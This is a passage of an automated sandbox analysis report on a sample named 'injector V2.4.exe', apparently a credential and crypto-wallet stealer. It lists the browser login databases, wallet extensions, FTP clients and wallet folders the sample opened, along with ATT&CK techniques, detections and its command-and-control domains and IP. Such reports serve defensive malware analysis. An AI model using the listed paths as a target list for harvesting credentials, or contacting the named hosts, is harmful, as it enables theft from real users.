            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: Yara matchFile source: Process Memory Space: injector V2.4.exe PID: 1492, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: injector V2.4.exe PID: 1492, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            211
            Process Injection
            11
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            211
            Process Injection
            LSASS Memory141
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information
            Security Account Manager11
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares31
            Data from Local System
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing
            LSA Secrets11
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            injector V2.4.exe34%ReversingLabsWin32.Trojan.Stealerc
            injector V2.4.exe100%AviraHEUR/AGEN.1361736
            injector V2.4.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://fumblingactor.cyou/apiY0%Avira URL Cloudsafe
            https://fumblingactor.cyou/apig0%Avira URL Cloudsafe
            https://fumblingactor.cyou/apiM0%Avira URL Cloudsafe
            https://fumblingactor.cyou/apik0%Avira URL Cloudsafe
            https://fumblingactor.cyou:443/apiTlZT0%Avira URL Cloudsafe
            https://fumblingactor.cyou/s0%Avira URL Cloudsafe
            fumblingactor.cyou0%Avira URL Cloudsafe
            https://fumblingactor.cyou:443/api100%Avira URL Cloudmalware
            https://fumblingactor.cyou/apiq0%Avira URL Cloudsafe
            https://fumblingactor.cyou/#0%Avira URL Cloudsafe
            https://fumblingactor.cyou/30%Avira URL Cloudsafe
            https://fumblingactor.cyou:443/apiicrosoft0%Avira URL Cloudsafe
            https://fumblingactor.cyou/0%Avira URL Cloudsafe
            https://fumblingactor.cyou/api100%Avira URL Cloudmalware
            https://fumblingactor.cyou/K0%Avira URL Cloudsafe
            https://fumblingactor.cyou/api;100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            fumblingactor.cyou
            172.67.219.199
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              peepburry828.sbsfalse
                high
                fumblingactor.cyoutrue
                • Avira URL Cloud: safe
                unknown
                p10tgrace.sbsfalse
                  high
                  processhol.sbsfalse
                    high
                    p3ar11fter.sbsfalse
                      high
                      https://fumblingactor.cyou/apitrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabinjector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://fumblingactor.cyou/apiginjector V2.4.exe, 00000004.00000003.2253728589.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#injector V2.4.exefalse
                            high
                            https://fumblingactor.cyou/sinjector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0injector V2.4.exefalse
                              high
                              http://ocsp.sectigo.com0injector V2.4.exefalse
                                high
                                https://fumblingactor.cyou/apiYinjector V2.4.exe, 00000004.00000003.2175491953.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiinjector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://fumblingactor.cyou:443/apiinjector V2.4.exe, injector V2.4.exe, 00000004.00000002.2254882908.0000000000536000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2203550234.000000000052F000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182688181.0000000000533000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#injector V2.4.exefalse
                                        high
                                        https://fumblingactor.cyou/apiMinjector V2.4.exe, 00000004.00000003.2241600983.0000000000544000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0injector V2.4.exefalse
                                          high
                                          https://fumblingactor.cyou:443/apiTlZTinjector V2.4.exe, 00000004.00000002.2254923759.0000000000545000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://x1.c.lencr.org/0injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchinjector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://fumblingactor.cyou/apiqinjector V2.4.exe, 00000004.00000003.2253728589.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://fumblingactor.cyou/#injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://fumblingactor.cyou/apikinjector V2.4.exe, 00000004.00000003.2150145038.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2147305126.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2145295992.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2152542985.0000000004EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.mozilla.org/products/firefoxgro.allinjector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#injector V2.4.exefalse
                                                    high
                                                    https://sectigo.com/CPS0injector V2.4.exefalse
                                                      high
                                                      https://fumblingactor.cyou/3injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoinjector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://fumblingactor.cyou:443/apiicrosoftinjector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#injector V2.4.exefalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.rootca1.amazontrust.com0:injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fumblingactor.cyou/injector V2.4.exe, injector V2.4.exe, 00000004.00000003.2122997963.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2122845833.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241547764.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123114421.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182661370.000000000053A000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254179791.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.ecosia.org/newtab/injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brinjector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://fumblingactor.cyou/Kinjector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ac.ecosia.org/autocomplete?q=injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpginjector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yinjector V2.4.exefalse
                                                                          high
                                                                          https://fumblingactor.cyou/api;injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zinjector V2.4.exefalse
                                                                            high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                172.67.219.199
                                                                                fumblingactor.cyouUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1560307
                                                                                Start date and time:2024-11-21 16:51:05 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 40s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
